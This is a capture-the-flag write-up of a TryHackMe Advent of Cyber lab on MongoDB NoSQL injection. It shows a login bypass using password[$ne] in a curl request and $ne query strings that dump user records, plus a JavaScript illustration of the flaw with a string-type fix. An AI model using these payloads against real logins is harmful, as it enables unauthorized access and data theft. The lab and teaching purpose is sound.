AoC3#07: Migration Without Security

We’re now on the last web exploitation task for the advent of cyber challenge, Day 7, Migration Without Security. So far I’ve written up:

  • Days 1-5, which were a walk in the park: very basic web exploitation stuff.
  • Day 6, noticeably harder and a lot more fun. This daily challenge covered local file inclusion (LFI), remote code execution (RCE) and log poisoning.

Day 7 Migration Without Security

This challenge focuses heavily on a MongoDB server, a NoSQL DBMS I don’t have a massive amount of knowledge of. Thankfully the concepts and theory of SQL injection carry across to other DBMSs, as far as I know.

We’re told in the story to SSH in with thm:tryhackme, which I glossed over and got royally confused. Anyway, once you’re SSH’d into the box, open the MongoDB shell with mongo.

Then simply dumping out the collection gives up the first flag.

> show databases
admin   0.000GB
config  0.000GB
flagdb  0.000GB
local   0.000GB

> use flagdb
switched to db flagdb

> show collections
flagColl

> db.flagColl.find()
{ "_id" : ObjectId("618806af0a...bdf42bd6a"), "flag" : "THM{8814a5e...9d944f9}" }

> 

I then opened up the webpage and put in some junk credentials. Needless to say they failed, but I grabbed the request from the browser and copied it out in curl format.

curl 'http://10.10.79.253/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.79.253' -H 'Connection: keep-alive' -H 'Referer: http://10.10.79.253/login' -H 'Cookie: connect.sid=s%3ACft6JjQFYCfFomIvvfP-meNcqCWB8sgo.KQios7SDLz%2FL7w6nQGdeiK%2FEFu0Eyg7pi%2FT4aJIj%2FtU' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'username=user1&password=pass1'

I then changed the final part of the request to read:

 --data-raw 'username=admin&password[$ne]=pass1'

And I got a redirection message back from the server. It worked!

As my browser has the same session cookie value, I then went to the homepage again and got redirected to the logged-in dashboard page.

I then clicked the link to grab the 1st flag for this challenge.

I then used a similar method to dump out the usernames with the role of guest. The URL variables can easily be manipulated in the browser to something like:

/search?username[$ne]=admin&role=guest

A similar modification gives up the third flag too:

/search?username[$ne]=junk&role[$ne]=junk

Scroll down through (presumably) all the username records. McSkidy is buried in that list somewhere.
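Why password[$ne]=pass1 and username[$ne]=admin work, as an added example that is not part of the writeup or the challenge's own application: Express-style extended query/body parsing turns a bracketed key into a nested object, and if that object is passed straight into a MongoDB query it becomes the $ne operator. The parser, the in-memory matcher (which understands only $ne) and the sample users below are simplified, constructed stand-ins, not real MongoDB; the hardened variant shows the usual fix of accepting only string values.

```javascript
// Added example (not from the writeup): how `password[$ne]=pass1` becomes a
// query operator, and one fix. Simplified bracket parser modelled on Express's
// extended form/query parsing, plus a tiny matcher that knows only `$ne`.

// Constructed sample collection standing in for the site's users.
const USERS = [
  { username: 'admin',   password: 'hunter2',   role: 'admin' },
  { username: 'mcskidy', password: 'elfsecret', role: 'guest' },
];

// Parse 'a=1&b[$ne]=2' into { a: '1', b: { $ne: '2' } } (one bracket level).
function parseForm(body) {
  const out = {};
  for (const pair of body.split('&')) {
    const [rawKey, rawVal = ''] = pair.split('=');
    const key = decodeURIComponent(rawKey), val = decodeURIComponent(rawVal);
    const m = key.match(/^([^[]+)\[([^\]]+)\]$/);
    if (m) (out[m[1]] = out[m[1]] || {})[m[2]] = val;
    else out[key] = val;
  }
  return out;
}

// Minimal matcher: a plain value must equal the field; { $ne: v } must differ.
function matches(doc, query) {
  return Object.entries(query).every(([field, cond]) =>
    cond && typeof cond === 'object' && '$ne' in cond
      ? doc[field] !== cond.$ne
      : doc[field] === cond);
}

// Vulnerable login: parsed values go straight into the query, so an operator
// object supplied by the client is honoured. Returns the matched user or null.
function loginVulnerable(body) {
  const { username, password } = parseForm(body);
  return USERS.find(u => matches(u, { username, password })) || null;
}

// Hardened login: credentials must be plain strings, so `{ $ne: ... }` objects
// (and anything else the parser nests) are rejected before the query is built.
function loginHardened(body) {
  const { username, password } = parseForm(body);
  if (typeof username !== 'string' || typeof password !== 'string') return null;
  return USERS.find(u => matches(u, { username, password })) || null;
}
```

The same parseForm/matches pair applied to a /search query string shows why role=guest combined with username[$ne]=admin lists every guest account.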

That completes Day 7 – relatively easy to be honest – but an important SQLi premise for a DB I know little about.

The writeup for Day 8 is now done – showing a whole day of PowerShell log analysis on a compromised Windows box.
